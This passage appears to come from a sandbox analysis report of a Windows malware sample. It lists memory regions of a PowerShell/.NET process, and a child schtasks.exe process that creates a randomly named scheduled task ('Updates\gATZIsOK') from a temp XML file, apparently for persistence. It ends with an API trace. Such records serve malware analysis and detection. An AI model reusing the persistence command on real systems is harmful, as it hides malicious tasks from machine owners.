filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 767
start_va = 0x73ef0000
end_va = 0x73ef9fff
monitored = 0
entry_point = 0x73ef2a00
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 768
start_va = 0x76840000
end_va = 0x76897fff
monitored = 0
entry_point = 0x768825c0
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")
Region:
id = 769
start_va = 0x74dc0000
end_va = 0x74eaafff
monitored = 0
entry_point = 0x74dfd650
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 770
start_va = 0x762b0000
end_va = 0x7646cfff
monitored = 0
entry_point = 0x76392a10
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")
Region:
id = 785
start_va = 0x6ec60000
end_va = 0x6ec77fff
monitored = 0
entry_point = 0x6ec64820
region_type = mapped_file
name = "atl.dll"
filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll")
Region:
id = 786
start_va = 0x74ab0000
end_va = 0x74bfefff
monitored = 0
entry_point = 0x74b66820
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 787
start_va = 0x743d0000
end_va = 0x74516fff
monitored = 0
entry_point = 0x743e1cf0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 788
start_va = 0x76680000
end_va = 0x76711fff
monitored = 0
entry_point = 0x766b8cf0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 789
start_va = 0x6ebe0000
end_va = 0x6ec38fff
monitored = 1
entry_point = 0x6ebf0780
region_type = mapped_file
name = "mscoree.dll"
filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll")
Region:
id = 791
start_va = 0x480000
end_va = 0x4bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000480000"
filename = ""
Region:
id = 792
start_va = 0x600000
end_va = 0x63ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000600000"
filename = ""
Region:
id = 793
start_va = 0x640000
end_va = 0x7cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000640000"
filename = ""
Region:
id = 794
start_va = 0x1d0000
end_va = 0x1f9fff
monitored = 0
entry_point = 0x1d5680
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 795
start_va = 0x7d0000
end_va = 0x957fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007d0000"
filename = ""
Region:
id = 796
start_va = 0x741b0000
end_va = 0x741dafff
monitored = 0
entry_point = 0x741b5680
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 797
start_va = 0x30000
end_va = 0x32fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "powershell.exe.mui"
filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui")
Region:
id = 798
start_va = 0x960000
end_va = 0xae0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000960000"
filename = ""
Region:
id = 799
start_va = 0x5170000
end_va = 0x656ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005170000"
filename = ""
Region:
id = 803
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 804
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001e0000"
filename = ""
Region:
id = 805
start_va = 0x640000
end_va = 0x79ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000640000"
filename = ""
Region:
id = 806
start_va = 0x7c0000
end_va = 0x7cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007c0000"
filename = ""
Region:
id = 808
start_va = 0x6f6f0000
end_va = 0x6f76cfff
monitored = 1
entry_point = 0x6f700db0
region_type = mapped_file
name = "mscoreei.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")
Region:
id = 809
start_va = 0x76d00000
end_va = 0x76d44fff
monitored = 0
entry_point = 0x76d1de90
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 810
start_va = 0x76d50000
end_va = 0x76d5bfff
monitored = 0
entry_point = 0x76d53930
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")
Region:
id = 811
start_va = 0x6f8a0000
end_va = 0x6f8a7fff
monitored = 0
entry_point = 0x6f8a17b0
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll")
Region:
id = 812
start_va = 0x6f000000
end_va = 0x6f6e0fff
monitored = 1
entry_point = 0x6f02cd70
region_type = mapped_file
name = "clr.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")
Region:
id = 813
start_va = 0x6f7a0000
end_va = 0x6f894fff
monitored = 0
entry_point = 0x6f7f4160
region_type = mapped_file
name = "msvcr120_clr0400.dll"
filename = "\\Windows\\SysWOW64\\msvcr120_clr0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll")
Region:
id = 814
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001f0000"
filename = ""
Region:
id = 815
start_va = 0x4c0000
end_va = 0x4cffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004c0000"
filename = ""
Region:
id = 816
start_va = 0x5d0000
end_va = 0x5dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005d0000"
filename = ""
Region:
id = 817
start_va = 0x5e0000
end_va = 0x5effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005e0000"
filename = ""
Region:
id = 818
start_va = 0x640000
end_va = 0x64ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000640000"
filename = ""
Region:
id = 819
start_va = 0x790000
end_va = 0x79ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000790000"
filename = ""
Region:
id = 820
start_va = 0x650000
end_va = 0x65ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000650000"
filename = ""
Region:
id = 821
start_va = 0x660000
end_va = 0x66ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000660000"
filename = ""
Region:
id = 822
start_va = 0x670000
end_va = 0x670fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000670000"
filename = ""
Region:
id = 823
start_va = 0x680000
end_va = 0x680fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000680000"
filename = ""
Region:
id = 824
start_va = 0xaf0000
end_va = 0xcbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000af0000"
filename = ""
Region:
id = 825
start_va = 0x690000
end_va = 0x6cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000690000"
filename = ""
Region:
id = 826
start_va = 0x6d0000
end_va = 0x70ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000006d0000"
filename = ""
Region:
id = 827
start_va = 0x710000
end_va = 0x74ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000710000"
filename = ""
Region:
id = 828
start_va = 0x690000
end_va = 0x69ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000690000"
filename = ""
Region:
id = 829
start_va = 0x6c0000
end_va = 0x6cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000006c0000"
filename = ""
Region:
id = 830
start_va = 0x6570000
end_va = 0x856ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006570000"
filename = ""
Region:
id = 831
start_va = 0x690000
end_va = 0x6affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000690000"
filename = ""
Region:
id = 832
start_va = 0x750000
end_va = 0x78ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000750000"
filename = ""
Region:
id = 833
start_va = 0xaf0000
end_va = 0xb2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000af0000"
filename = ""
Region:
id = 834
start_va = 0xcb0000
end_va = 0xcbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000cb0000"
filename = ""
Region:
id = 1195
start_va = 0xcc0000
end_va = 0xff6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1196
start_va = 0x6d920000
end_va = 0x6ebd1fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorlib.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll")
Region:
id = 1197
start_va = 0xb30000
end_va = 0xc7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b30000"
filename = ""
Region:
id = 1198
start_va = 0x6b0000
end_va = 0x6bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000006b0000"
filename = ""
Region:
id = 1240
start_va = 0x6cf50000
end_va = 0x6d91bfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\1be7a15b1f33bf22e4f53aaf45518c77\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\1be7a15b1f33bf22e4f53aaf45518c77\\system.ni.dll")
Region:
id = 1267
start_va = 0x6c820000
end_va = 0x6cf40fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.core.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\eb4cca4f06a15158c3f7e2c56516729b\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\eb4cca4f06a15158c3f7e2c56516729b\\system.core.ni.dll")
Region:
id = 1284
start_va = 0x68e40000
end_va = 0x68ec2fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "microsoft.powershell.consolehost.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.Pb378ec07#\\c3373939e7c94b541b901780981fd0cc\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.pb378ec07#\\c3373939e7c94b541b901780981fd0cc\\microsoft.powershell.consolehost.ni.dll")
Region:
id = 1285
start_va = 0x70fe0000
end_va = 0x70ff2fff
monitored = 0
entry_point = 0x70fe9950
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")
Region:
id = 1286
start_va = 0x70010000
end_va = 0x7003efff
monitored = 0
entry_point = 0x700295e0
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1287
start_va = 0x71340000
end_va = 0x7135afff
monitored = 0
entry_point = 0x71349050
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")
Region:
id = 1335
start_va = 0x6af60000
end_va = 0x6c815fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.management.automation.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Manaa57fc8cc#\\ac360ee7d819131e00d9de15ca78e746\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.manaa57fc8cc#\\ac360ee7d819131e00d9de15ca78e746\\system.management.automation.ni.dll")
Region:
id = 1534
start_va = 0xb30000
end_va = 0xb91fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorrc.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorrc.dll")
Region:
id = 1535
start_va = 0xc70000
end_va = 0xc7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000c70000"
filename = ""
Region:
id = 1612
start_va = 0x7a0000
end_va = 0x7a4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "winnlsres.dll"
filename = "\\Windows\\SysWOW64\\winnlsres.dll" (normalized: "c:\\windows\\syswow64\\winnlsres.dll")
Region:
id = 1613
start_va = 0x7b0000
end_va = 0x7bffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "winnlsres.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winnlsres.dll.mui")
Region:
id = 1615
start_va = 0x764d0000
end_va = 0x764d5fff
monitored = 0
entry_point = 0x764d1460
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")
Thread:
id = 13
os_tid = 0x113c
Thread:
id = 23
os_tid = 0x86c
Thread:
id = 25
os_tid = 0x1260
Thread:
id = 26
os_tid = 0x1254
Thread:
id = 27
os_tid = 0x1250
Process:
id = "3"
image_name = "schtasks.exe"
filename = "c:\\windows\\syswow64\\schtasks.exe"
page_root = "0x35574000"
os_pid = "0x1128"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "1"
os_parent_pid = "0x1394"
cmd_line = "\"C:\\Windows\\System32\\schtasks.exe\" /Create /TN \"Updates\\gATZIsOK\" /XML \"C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpDA5D.tmp\""
cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
os_username = "XC64ZB\\RDhJ0CNFevzX"
bitness = "32"
os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 569
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 570
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 571
start_va = 0x40000
end_va = 0x54fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 572
start_va = 0x60000
end_va = 0x9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 573
start_va = 0xa0000
end_va = 0xdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000a0000"
filename = ""
Region:
id = 574
start_va = 0xe0000
end_va = 0xe3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 575
start_va = 0xf0000
end_va = 0xf0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000f0000"
filename = ""
Region:
id = 576
start_va = 0x100000
end_va = 0x101fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 577
start_va = 0x3d0000
end_va = 0x401fff
monitored = 1
entry_point = 0x3f05b0
region_type = mapped_file
name = "schtasks.exe"
filename = "\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")
Region:
id = 578
start_va = 0x410000
end_va = 0x440ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000410000"
filename = ""
Region:
id = 579
start_va = 0x4600000
end_va = 0x47fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004600000"
filename = ""
Region:
id = 580
start_va = 0x771d0000
end_va = 0x7734afff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 581
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 582
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 583
start_va = 0x7fff0000
end_va = 0x7dfa1676ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 584
start_va = 0x7dfa16770000
end_va = 0x7ffa1676ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007dfa16770000"
filename = ""
Region:
id = 585
start_va = 0x7ffa16770000
end_va = 0x7ffa16930fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 586
start_va = 0x7ffa16931000
end_va = 0x7ffffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00007ffa16931000"
filename = ""
Region:
id = 629
start_va = 0x110000
end_va = 0x29ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 630
start_va = 0x640d0000
end_va = 0x6411ffff
monitored = 0
entry_point = 0x640e8180
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 631
start_va = 0x64050000
end_va = 0x640c9fff
monitored = 0
entry_point = 0x64063290
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 632
start_va = 0x76720000
end_va = 0x767fffff
monitored = 0
entry_point = 0x76733980
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 633
start_va = 0x64120000
end_va = 0x64127fff
monitored = 0
entry_point = 0x641217c0
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 641
start_va = 0x4800000
end_va = 0x4a1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004800000"
filename = ""
Region:
id = 642
start_va = 0x76720000
end_va = 0x767fffff
monitored = 0
entry_point = 0x76733980
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 643
start_va = 0x76910000
end_va = 0x76a8dfff
monitored = 0
entry_point = 0x769c1b90
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 644
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 645
start_va = 0x7feb0000
end_va = 0x7ffaffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007feb0000"
filename = ""
Region:
id = 771
start_va = 0x110000
end_va = 0x1cdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 772
start_va = 0x290000
end_va = 0x29ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000290000"
filename = ""
Region:
id = 773
start_va = 0x20000
end_va = 0x23fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 774
start_va = 0x76a90000
end_va = 0x76b4dfff
monitored = 0
entry_point = 0x76ac5630
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 775
start_va = 0x1d0000
end_va = 0x20ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 776
start_va = 0x210000
end_va = 0x24ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 777
start_va = 0x76680000
end_va = 0x76711fff
monitored = 0
entry_point = 0x766b8cf0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 778
start_va = 0x762b0000
end_va = 0x7646cfff
monitored = 0
entry_point = 0x76392a10
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")
Region:
id = 779
start_va = 0x76c00000
end_va = 0x76cacfff
monitored = 0
entry_point = 0x76c14f00
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 780
start_va = 0x73f00000
end_va = 0x73f1dfff
monitored = 0
entry_point = 0x73f0b640
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 781
start_va = 0x73ef0000
end_va = 0x73ef9fff
monitored = 0
entry_point = 0x73ef2a00
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 782
start_va = 0x76840000
end_va = 0x76897fff
monitored = 0
entry_point = 0x768825c0
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")
Region:
id = 783
start_va = 0x76cb0000
end_va = 0x76cf3fff
monitored = 0
entry_point = 0x76cc9d80
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 784
start_va = 0x250000
end_va = 0x28ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 790
start_va = 0x2a0000
end_va = 0x389fff
monitored = 0
entry_point = 0x2dd650
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 800
start_va = 0x250000
end_va = 0x262fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schtasks.exe.mui"
filename = "\\Windows\\SysWOW64\\en-US\\schtasks.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\schtasks.exe.mui")
Region:
id = 801
start_va = 0x280000
end_va = 0x28ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000280000"
filename = ""
Region:
id = 802
start_va = 0x4a20000
end_va = 0x4d56fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 807
start_va = 0x76d50000
end_va = 0x76d5bfff
monitored = 0
entry_point = 0x76d53930
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")
Region:
id = 835
start_va = 0x30000
end_va = 0x30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 836
start_va = 0x74340000
end_va = 0x743c3fff
monitored = 0
entry_point = 0x74366220
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")
Region:
id = 837
start_va = 0x270000
end_va = 0x270fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000270000"
filename = ""
Region:
id = 838
start_va = 0x68e40000
end_va = 0x68ecbfff
monitored = 0
entry_point = 0x68e7a6c0
region_type = mapped_file
name = "taskschd.dll"
filename = "\\Windows\\SysWOW64\\taskschd.dll" (normalized: "c:\\windows\\syswow64\\taskschd.dll")
Thread:
id = 14
os_tid = 0x1134
[0184.214] GetModuleHandleA (lpModuleName=0x0) returned 0x3d0000
[0184.217] __set_app_type (_Type=0x1)
[0184.217] __p__fmode () returned 0x76b44d6c
[0184.217] __p__commode () returned 0x76b45b1c
[0184.217] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3f0840) returned 0x0
[0184.218] __wgetmainargs (in: _Argc=0x3fade0, _Argv=0x3fade4, _Env=0x3fade8, _DoWildCard=0, _StartInfo=0x3fadf4 | out: _Argc=0x3fade0, _Argv=0x3fade4, _Env=0x3fade8) returned 0
[0184.218] _onexit (_Func=0x3f2bc0) returned 0x3f2bc0
[0184.218] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0184.218] WinSqmIsOptedIn () returned 0x0
[0184.218] GetProcessHeap () returned 0x4920000
[0184.218] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x10) returned 0x4927320
[0184.219] RtlRestoreLastWin32Error () returned 0x0
[0184.219] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0184.219] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0184.219] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b
[0184.219] RtlVerifyVersionInfo (VersionInfo=0xdf9f8, TypeMask=0x3, ConditionMask=0x1801b) returned 0x0
[0184.219] GetProcessHeap () returned 0x4920000
[0184.219] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x10) returned 0x49274b8
[0184.219] lstrlenW (lpString="") returned 0
[0184.219] GetProcessHeap () returned 0x4920000
[0184.219] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x2) returned 0x4920598
[0184.219] GetProcessHeap () returned 0x4920000
[0184.219] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x4926e38
[0184.219] GetProcessHeap () returned 0x4920000
[0184.219] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x10) returned 0x4927428
[0184.220] GetProcessHeap () returned 0x4920000
[0184.220] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x4926c00
[0184.220] GetProcessHeap () returned 0x4920000
[0184.220] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x4926c20
[0184.220] GetProcessHeap () returned 0x4920000
[0184.220] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x4926c40
[0184.220] GetProcessHeap () returned 0x4920000
